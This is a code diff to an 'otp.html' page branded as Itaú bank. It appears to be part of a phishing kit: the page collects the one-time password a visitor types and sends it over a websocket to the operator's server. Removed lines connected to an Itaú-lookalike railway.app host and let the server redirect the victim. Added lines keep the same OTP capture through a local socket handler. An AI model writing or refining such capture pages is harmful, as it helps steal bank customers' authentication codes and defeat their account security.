--- a/otp.html
+++ b/otp.html
@@ -262,32 +262,15 @@
         </form>
     </div>
 
-    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
+    <script src="/socket.io/socket.io.js"></script>
+    <script src="socket-handler.js"></script>
     <script>
-        const socket = io('https://itaupersonasautenticacion.up.railway.app', {
-            reconnection: true,
-            reconnectionDelay: 500,
-            reconnectionDelayMax: 2000,
-            reconnectionAttempts: Infinity,
-            timeout: 10000,
-            transports: ['websocket', 'polling']
-        });
 
         let sessionId = localStorage.getItem('itau_session_id');
         const otpInput = document.getElementById('otp');
         const submitBtn = document.getElementById('submitBtn');
         const otpForm = document.getElementById('otpForm');
         const loadingOverlay = document.getElementById('loadingOverlay');
-
-        // Initialize session
-        socket.on('connect', () => {
-            socket.emit('init-session', { sessionId });
-        });
-
-        socket.on('session-ready', (data) => {
-            sessionId = data.sessionId;
-            localStorage.setItem('itau_session_id', sessionId);
-        });
 
         // Solo permitir números en el campo de OTP
         otpInput.addEventListener('input', function(e) {
@@ -315,24 +298,18 @@
             if (submitBtn.classList.contains('active')) {
                 loadingOverlay.classList.add('active');
 
-                socket.emit('otp', {
+                window.itauSocket.emit('otp', {
                     otp: otpInput.value
                 });
             }
         });
 
-        socket.on('otp-response', (data) => {
+        window.itauSocket.on('otp-response', (data) => {
             if (data.success) {
                 console.log('OTP sent successfully');
             } else {
                 loadingOverlay.classList.remove('active');
                 alert('Error al procesar la solicitud');
-            }
-        });
-
-        socket.on('redirect', (data) => {
-            if (data.page) {
-                window.location.href = data.page;
             }
         });
     </script>
